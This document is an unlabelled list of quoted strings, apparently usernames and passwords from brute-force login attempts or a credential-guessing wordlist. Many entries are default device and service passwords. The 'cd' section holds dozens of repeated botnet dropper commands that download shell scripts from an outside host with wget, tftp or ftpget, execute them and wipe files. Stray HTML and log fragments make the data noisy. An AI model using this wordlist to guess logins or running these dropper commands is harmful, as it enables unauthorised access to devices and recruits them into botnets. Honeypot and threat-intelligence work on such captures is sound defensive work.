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"abc123,./" "abcd 1234" "abcd,./123456789" "abcd1234" "abo _~!fhdZllffZZmm" "acc" "access" "account" "ace" "acer1019** " "activemq" "adam" "adfexc" "adm" "adm123" "admax5543" "admin "admin " "admin" "admin (Unknown)" "admin'123" "admin,./" "admin,./123456789" "admin123" "admin123# " "admin123,./" "admin1234" "admin123456" "admin2014" "admin_1" "adminadmin" "admincpto" "administrador" "administrateur" "administrator" "admins" "admintelecom" "adminttd" "adminyetus yetus" "admissions" "admn" "adrian" "adslolitec" "adn" "aerohive" "agsadmin" "ahmedeggdrop eggdrop" "aiden" "alan" "alanna " "alcool112xz" "alex" "alexander" "alexander123" "alohaboh" "alok" "alpine" "alupigus" "aman" "amber123" "amir123" "amit" "amssys" "amy" "amy amy" "amy123" "andQQ??13720787" "andrew" "angel" "angelo123" "angry" "anicust" "ankit" "ankur" "anna123" "anne" "anon" "anonymous" "anthony" "anudeep" "any@" "apache" "apache2" "apachesvn" "app" "apple" "applmgr" "appserver" "appserver123" "aptproxy" "arthur123" "articon" "arun" "asante" "ascend" "asd" "asd123,./" "asdffghjkl;'" "asdfghj,./123456789" "asdfghjkl:""" "asdfghjkl;'" "asdfghjkl;'0123456789" "asdfghjkl;'123456789" "asdfghjkl;'\" "asdfghjkl;'\\" "asdfghjkl;\'\\" "asf#@@^(*][.,sdf143487" "asher" "ashish" "ashok" "ask" "asteriskftp" "at4400" "atlantis" "attack" "austin" "auth_rhosts2: clientuser %s hostname %s ipaddr %s" "awt" "ayden" "azsxdcfvgbhnjmk," "azsxdcfvgbhnjmk,l." "b" "b 53 yew" "baba,./" "backup" "backup1" "backup1234" "backuppc" "banana123," "barricade" "bart123" "bash" "bciimpw" "bcimpw" "bcmspw" "bcnaspw" "benedikt2011" "benjamin" "bentley" "bf3server" "bianca123" "bigfoot " "billing" "bin" "bintec" "bios" "bitnami" "bitrix" "bitrix1" "bl3rand,." "blake" "blender" "bluehns,GoLh" "bluepw" "blhajk" "bnc" "bnhy789okm," "board" "bob" "bodhilinux" "bostanel" "bot" "boys" "brandon" "brayden" "brian123" "brody" "browsepw" "budget" "budget123" "buhNetherlands" "build" "build123" "business" "buxinga " "byte" "c" "c " "c major" "cOmm83Ni !" "cableroot" "cacadmin" "cactiserver" "cactiuser" "caddy " "caleb" "calvin" "camden" "cameron" "can't" "caonima " "caonima,./" "car" "carson" "carter" "cascade" "cashier" "catalina," "ccrusr" "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; tftp -r tftp.sh -g neger1.dingle.dog; sh tftp.sh; wget http://neger.dingle.dog/bin.sh; sh bin.sh; busybox wget http://neger.dingle.dog/bin1.sh; sh bin1.sh" "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wget; chmod 777 gbb.sh; sh gbb.sh; tftp -r 1tftp.sh -g; sh 1tftp.sh; tftp -c get 2tftp.sh; sh 2tftp.sh; rm -rf gbb.sh 1tftp.sh 2tftp.sh; exit" "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget; sh wbin.sh; wget1; sh wbin2.sh; tftp -r tbin.sh -g; sh tbin.sh; tftp -c get tbin2.sh; sh tbin2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bin/-wget" "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget || wget || busybox tftp -r bin2.sh -g || tftp -r bin2.sh -g || busybox tftp -c get bin3.sh || tftp -c get bin3.sh || busybox ftpget bin4.sh bin4.sh;sh bin.sh || sh bin2.sh || sh bin3.sh || sh bin4.sh;exit" "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget;sh bin.sh;busybox tftp -r bin2.sh -g;sh bin2.sh;busybox tftp -c get bin3.sh;sh bin3.sh;busybox ftpget bin4.sh bin4.sh;sh bin4.sh;exit" "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;wget; sh c.sh; tftp -r cc.sh -g; sh cc.sh; tftp -c get ccc.sh; sh ccc.sh;rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod 777 bins.sh; sh bins.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/run;wget;sh bint.sh;rm -rf bint.sh;tftp -r bint1.sh -g;sh bint1.sh; tftp -c get bint2.sh; sh bint2.sh; rm -rf bint1.sh bint2.sh bint.sh" "cd /tmp || cd /var/run;wget;sh bint.sh;rm -rf bint.sh;tftp -r bint1.sh -g;sh bint1.sh; tftp -c get bint2.sh; sh bint2.sh; rm -rf bint1.sh bint2.sh bint.sh" "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget; chmod 777 gtop.sh; sh gtop.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget; chmod 777 gtop.sh; sh gtop.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget; chmod 777 gtop.sh; sh gtop.sh; tftp -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *" "celine123" "cellit" "centos" "cgadmin" "chandru" "changeme "changeme" "changeme2" "chaonimabi123456123" "charles" "charlotte123" "charset=iso-8859-1""/>" "chase" "chel sea " "cheng,./123456789" "china!@#2011,./" "china!@#2014,./" "china,./" "chinacCOM1qaz0okm" "chip chip" "chris" "chris123" "christian" "christopher" "cisco" "cisco123" "ckl" "claire123" "clamav" "clasic" "clfs" "client" "close" "cloud" "cloud-user" "cmaker" "cms" "cms500" "cmsftp" "cntv 1234@XM" "cntv 1234@XM.ops.cntv.cn" "colton" "com," "comcomcom" "common" "conexant" "connor" "contact" "control" "control123" "cooper" "core" "corecess" "couchdb" "coupon" "cp.jqrs8.com " "cpanel" "cqcq.kxso.com,." "craft" "craftpw" "creparola123parola123tzu" "crftpw" "crystal widener" "csgo1" "csgoserver1" "csm" "css" "csserver:csserver123 "ct_q1w2e3 " "ctrls" "ctrls.1234" "cube" "cubie" "cunge284137016 " "custpw" "cvs" "cvsadmin" "cyber" "cyrusimap" "d.e.b.u.g" "d/5*1-4 ,e18" "d/5*1-4+,e18" "d/51-4+,e18" "d3 3k 0r" "d3b1an" "d3v3l0p3r" "dabestmouse" "dadmin01" "daemon" "dan" "dance4life" "danger" "daniel" "daniel123" "danny" "daokers " "darwin%we/=! ope" "dasusr1" "data" "database" "date" "david" "davox" "db2admin" "db2fenc1" "db2fenc2" "db2inst" "db2inst1" "db2inst2" "db2inst3" "dbuser" "dc" "dean pula" "debestmouse" "debian" "debian123" "debug" "dedeteyubesc" "default "default" "deletenow" "deluge" "demi123" "demo" "denied." "dennis123" "deploy" "deployer" "design" "desktop" "dev" "dev123" "dev1234" "develop" "develop[]:SSHroot" "developer" "device" "devil" "dhs3mt" "dhs3pms" "diamond" "diego" "digitalOcean123" "digitalocean123" "dingqi.," "dinsdale12" "director" "disk,./1234" "divine" "djh101122..// " "dms" "dns99 588" "dnsii2015" "doctor" "dog cat forrest" "domain" "dominic" "download" "downloads" "dreambox" "dreamer" "dsbn1k77.," "dspace" "dumitrescu" "dup" "dvs" "dylan" "e t c" "e250changeme" "e500changeme" "e84,Se4S" "easton" "ec2-user" "echo" "education" "electrical" "eleve" "eli" "elijah" "engineer" "enkins jenkins12" "enquirypw" "epicrouter" "eppc" "eric" "eric123" "erp" "ethan" "ethernet" "evan" "extendnet" "ezcom768" "f0.514/* r" "f0rM3,." "f0rum123" "f1031nn" "fanfmspania" "fax" "fedora" "feishu@167234#@" "fibranne" "field" "finance" "fivranne" "fix .!." "fld" "flkadsjfldka" "fmaster" "forum" "forum123" "frank" "freenas" "freund" "friend" "frontrow" "ftp" "ftp123" "ftpadmin" "ftpuser" "ftpuser123" "ftpuser2wqasxz" "ftpuseraditza muielumata" "g30123- " "gabriel" "games" "games123" "ganteng" "gary123" "gateway" "gavin" "gen1" "gen2" "george" "gerson " "ghost" "ghost123" "giraff" "girl" "git" "git " "git01" "git123 " "gitadmin" "gitgit" "gituser" "gmod" "gmod123" "gmodserver:gmodserver123 "gnats" "gnuworld123" "google " "gopher" "grayson" "guest" "guest123" "guest;'\\\\\\\\" "h179350" "ha,bon!45" "ha,kel!folies" "hadoop" "hadoop123" "hagpolm1" "hannah 12" "hannah 123" "hans" "harrypotter" "hdfs" "hdtj34593Z0Z()%8069 gjdflk!~~@##223r" "helloworld" "help" "help123" "help1954" "henry" "hexin" "highspeed" "hill" "hill123" "hitron" "hkh,dh;" "hlds" "hlds01" "hlds123" "ho4uku6at" "hp.com" "hsadb" "hsadb " "htpcguides" "htpguides" "http-equiv=""Content-Type""" "httpd" "huawei@huawei.com "hudson" "hungaria" "hunter" "i'mcoming" "iDirect" "ian" "id=""header"">

Server" "idc1.23457E 13" "idc123,abc" "idc1qazxcvbnm,./" "idc2-pl,=" "idc2-pl,=[;." "idc2-pl,=[;.1" "idc2=[;.]'/" "idc510.com.,~!@" "idcfo123ABC!@#," "idcqpwoeiruty _)" "idczxcvbnm,./" "identd" "image" "image123" "inads" "index" "indspw" "info" "info123" "informix" "initpw" "installer" "intel" "inter" "intermec" "internet" "ioio,./" "iokl,.89" "iopkl;,." "ios" "ironport" "isaac" "isaiah" "isee" "iso939it2011 _" "iubiiubi :" "j3nk1ns" "jKRMdB8v123" "ja net " "jace" "jack" "jackson" "jacob" "james" "james123" "jason" "javi" "jaxon" "jaxson" "jayden" "jboss" "jboss123" "jenkins" "jenkins123" "jenkinspass" "jeremiah" "jin -123789" "jira" "jkl;'\" "john" "john " "john123" "joinUS1" "jonathan" "jonny" "joomla123" "jordan" "jose" "joseph" "joshua" "josiah" "juan" "jule,ma" "jule,mamnd" "julian" "julien" "justin" "kYrh'Ni" "kakamaka" "karaf" "kather " "kayden" "kermit" "kernel" "kevin" "kill -9" "killer" "kilo1987" "kioklko0" "kirill" "kodi" "koha" "kont2004" "kor" "l2" "l3" "l;'';l" "l;',." "l;',./" "landon" "lanyanidc,./" "laoni###345 " "last" "ldqsz,bpmcs." "lds,,456" "leo" "letacla" "letmain" "letmein" "levi" "li,./123456789" "liam" "libuuid123" "liferay" "linbr240482" "lincoln" "linga" "linux" "linux123" "linux" "list" "live" "lj,hjdjkmcrbQ" "lk2015.com "lkj,./123456789" "llatsni" "lo9;p0'" "locatepw" "log" "logan" "login" "logname=%s uid=%d euid=%d tty=%s ruser=%s rhost=%s %s%s$_0~" "looker" "love187329yes " "lp" "lpd" "lsfadmin" "luc2011!@# itac2010" "lucas" "lucenttech1" "lucenttech2" "luis" "luke" "luojia,,,zhang" "luyouqi " "m,./jkl;" "m,./jkl;uiop7890" "m,.jkluio789" "m,jkui78" "m,jkui78.lo9" "m1122" "m1n3craft" "m1necr4ft" "ma12CE3,k" "machine" "magic4magic" "mainmainjd,157$!?(" "maintpw" "manager "manager" "manager123.. G" "mapred" "mark123" "martin123" "mason" "master" "masterkey" "matt123" "matthew" "mb" "mc123" "mdb" "me1234 " "media" "mediator" 